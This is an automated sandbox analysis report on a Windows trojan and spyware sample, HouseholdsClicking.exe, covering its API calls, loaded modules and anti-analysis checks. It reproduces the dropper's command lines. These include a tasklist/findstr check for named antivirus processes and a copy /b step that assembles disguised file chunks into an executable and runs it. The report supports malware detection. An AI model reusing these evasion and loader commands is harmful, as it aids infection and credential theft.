                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/21@12/2
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E341FA GetLastError,FormatMessageW,10_2_00E341FA
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E22010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00E22010
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E21A0B AdjustTokenPrivileges,CloseHandle,10_2_00E21A0B
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00E2DD87
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E33A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00E33A0E
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile created: C:\Users\user\AppData\Local\Temp\nse5A80.tmpJump to behavior
                  Source: HouseholdsClicking.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Appliance.com, 0000000A.00000003.2036642508.0000000004338000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036468710.0000000004367000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036326757.0000000004434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: HouseholdsClicking.exeVirustotal: Detection: 69%
                  Source: HouseholdsClicking.exeReversingLabs: Detection: 60%
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile read: C:\Users\user\Desktop\HouseholdsClicking.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\HouseholdsClicking.exe "C:\Users\user\Desktop\HouseholdsClicking.exe"
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 19152
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Bookmarks" Sv
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com Appliance.com M
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 19152Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Bookmarks" Sv Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina MJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com Appliance.com MJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: HouseholdsClicking.exeStatic file information: File size 1051945 > 1048576
                  Source: HouseholdsClicking.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                  Source: HouseholdsClicking.exeStatic PE information: real checksum: 0x108ea2 should be: 0x1099a0
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE0DE6 push ecx; ret 10_2_00DE0DF9

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\19152\Appliance.comJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\19152\Appliance.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E526DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00E526DD
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DDFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00DDFC7C
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comAPI coverage: 3.9 %
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com TID: 6844Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E2DC54
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E3A087
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E3A1E2
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00E2E472
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00E3A570
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E366DC FindFirstFileW,FindNextFileW,FindClose,10_2_00E366DC
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DFC622 FindFirstFileExW,10_2_00DFC622
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E373D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00E373D4
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E37333 FindFirstFileW,FindClose,10_2_00E37333
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E2D921
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00DC5FC8
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\19152\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\19152Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Appliance.com, 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3F4FF BlockInput,10_2_00E3F4FF
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00DC338B
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE5058 mov eax, dword ptr fs:[00000030h]10_2_00DE5058
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E220AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_00E220AA
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DF2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00DF2992
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00DE0BAF
